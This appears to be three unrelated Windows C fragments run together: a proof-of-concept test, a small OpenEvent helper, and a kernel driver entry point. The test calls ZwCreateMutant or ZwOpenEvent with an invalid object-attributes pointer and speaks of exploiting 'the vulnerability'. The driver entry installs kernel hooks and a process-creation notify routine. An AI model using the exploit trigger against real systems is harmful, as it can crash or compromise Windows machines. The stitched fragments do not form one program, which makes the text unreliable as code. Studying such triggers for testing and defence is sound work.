int main(int argc,char **argv) { about(); if (argc!=2) { usage(); return 1; } if (!stricmp(argv[1],"NtCreateMutant") || !stricmp(argv[1],"ZwCreateMutant")) { HANDLE handle; OBJECT_ATTRIBUTES oa; InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL); ZwCreateMutant(&handle,0,&oa,FALSE); } else if (!stricmp(argv[1],"NtOpenEvent") || !stricmp(argv[1],"ZwOpenEvent")) { HANDLE handle; OBJECT_ATTRIBUTES oa; InitializeObjectAttributes(&oa,(PVOID)1,0,NULL,NULL); ZwOpenEvent(&handle,0,&oa); } else printf("\nI do not know how to exploit the vulnerability using this function.\n"); printf("\nTEST FAILED!\n"); return 1; }
/* Open an event */ HANDLE NTAPI OpenEvent( ULONG AccessMask, PWSTR Name ) { OBJECT_ATTRIBUTES Oa; UNICODE_STRING EventName; NTSTATUS Status; HANDLE EventHandle; RtlInitUnicodeString (&EventName, Name); InitializeObjectAttributes (&Oa, &EventName, OBJ_CASE_INSENSITIVE, 0, 0); Status = ZwOpenEvent ( &EventHandle, AccessMask, &Oa); if (!NT_SUCCESS(Status)) { EventHandle = NULL; } return EventHandle; }
NTSTATUS DriverEntry ( PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath ) { NTSTATUS status; HANDLE event; BOOLEAN clean = FALSE; PDEVICE_OBJECT devobj; ULONG maver, miver, phase; UNICODE_STRING dn; OBJECT_ATTRIBUTES oa; RtlInitUnicodeString(&dn, MU_EVENTNAME_BOOTSYNC); InitializeObjectAttributes(&oa, &dn, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL); status = ZwOpenEvent(&event, EVENT_ALL_ACCESS, &oa); if (NT_SUCCESS(status)) { ZwSetEvent(event, NULL); ZwClose(event); } RtlInitUnicodeString(&dn, MU_DEVNAME_HOST_CONTROL); phase = PHASE_CREATE_DEVICE; status = IoCreateDevice(DriverObject, 0, &dn, FILE_DEVICE_UNKNOWN, 0, FALSE, &devobj); if (NT_SUCCESS(status)) { PsGetVersion(&maver, &miver, NULL, NULL); OsVersion = (maver << 16) | miver; OsVersion |= MmIsThisAnNtAsSystem() ? 0x80000000 : 0; phase = PHASE_CHECK_OS_VERSION; switch (OsVersion) { case VER_WINXP: case VER_WIN2K3: case VER_WIN7: break; case VER_WIN2K8R2: case VER_WIN2K8: case VER_VISTA: //break; default: goto MuDriverEntry_Failure; } MuInitializeGlobalData(&g_GlobalData); phase = PHASE_LOAD_DATABASE; status = MuLoadDatabase(&g_GlobalData); if (!NT_SUCCESS(status)) goto MuDriverEntry_Failure; phase = PHASE_INIT_KERNEL_HOOK; status = MuInitializeKernelHook(&g_GlobalData); if (!NT_SUCCESS(status)) goto MuDriverEntry_Failure; phase = PHASE_SET_NOTIFY; status = PsSetCreateProcessNotifyRoutine(MuCreateProcessNotify, FALSE); if (!NT_SUCCESS(status)) goto MuDriverEntry_Failure; clean = TRUE; phase = PHASE_INIT_HELPER; status = MuInitializeUserModeHelper(&g_GlobalData); if (!NT_SUCCESS(status)) goto MuDriverEntry_Failure; DriverObject->MajorFunction[IRP_MJ_CREATE] = MuDispatchCreateClose; DriverObject->MajorFunction[IRP_MJ_CLOSE] = MuDispatchCreateClose; DriverObject->MajorFunction[IRP_MJ_POWER] = MuDispatchPower; DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MuDispatchDeviceControl; goto MuDriverEntry_End; MuDriverEntry_Failure: if (clean) PsSetCreateProcessNotifyRoutine(MuCreateProcessNotify, TRUE); IoDeleteDevice(devobj); } MuDriverEntry_End: RegistryPath->Buffer[RegistryPath->Length / sizeof(WCHAR)] = 0; if (NT_SUCCESS(status)) MuDeleteRegistryValue(RegistryPath->Buffer, MU_REGVAL_LAST_ERROR); else MuSetErrorCode(RegistryPath, phase, status); if (phase > PHASE_INIT_KERNEL_HOOK) return STATUS_SUCCESS; return status; }